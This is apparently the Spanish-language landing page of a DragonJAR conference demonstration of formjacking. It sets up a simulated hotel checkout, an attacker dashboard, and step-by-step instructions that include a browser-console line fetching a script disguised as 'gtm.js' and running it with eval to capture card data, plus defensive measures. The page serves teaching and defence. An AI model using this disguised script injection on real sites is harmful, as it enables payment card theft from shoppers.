🔥 DragonJAR

Demostración Educativa de Formjacking

⚠️ ADVERTENCIA LEGAL Y ÉTICA

🎯 Panel Administrativo

Panel de control donde se visualizan las capturas en tiempo real (simulando el dashboard del atacante).

Acceder al Panel

🏨 Checkout Demo

Sitio web simulado de reserva de hotel donde se inyectará el script malicioso.

Ir al Checkout

📜 Script Inyector

Script JavaScript que captura los datos del formulario y los envía al backend.

Ver Script

📋 Pasos para la Demostración

1

Iniciar el Backend

Ejecutar el servidor Flask en una terminal:

python3 app.py
2

Acceder al Panel Administrativo

Abrir en una pestaña: http://localhost:5000/dashboard

Credenciales: admin / DragonJAR2026

3

Abrir el Sitio de Checkout

En otra pestaña: http://localhost:5000/demo

4

Inyectar el Script

Abrir la consola del navegador (F12) en la pestaña del checkout y pegar:

fetch('http://localhost:5000/static/gtm.js').then(r=>r.text()).then(eval)

O copiar y pegar el contenido completo del archivo injector.js

5

Completar el Formulario

Llenar el formulario con datos de prueba (tarjeta falsa: 4111111111111111)

6

Observar la Captura

Hacer clic en "Realizar Pago" y ver cómo los datos aparecen en el panel administrativo en tiempo real.

7

Demostrar el Impacto

En el panel admin, hacer clic en "Revelar" para mostrar el número completo de tarjeta y explicar el ciclo del ataque.

🛡️ Cómo Defenderse

Puntos clave para mencionar en la charla:

  • Implementar Content Security Policy (CSP)
  • Subresource Integrity (SRI) para scripts
  • Monitoreo de cambios en el DOM
  • Tokenización de tarjetas (PCI DSS)
  • Auditorías regulares de código

📊 Estadísticas Reales

Datos para contextualizar:

  • Magecart: $500M+ en fraudes
  • Promedio: 300K sitios comprometidos/año
  • Valor dark web: $5-$110 por tarjeta
  • Tiempo de detección promedio: 197 días

DragonJAR Security Conference 2026

Demostración Educativa - Solo para uso en entorno controlado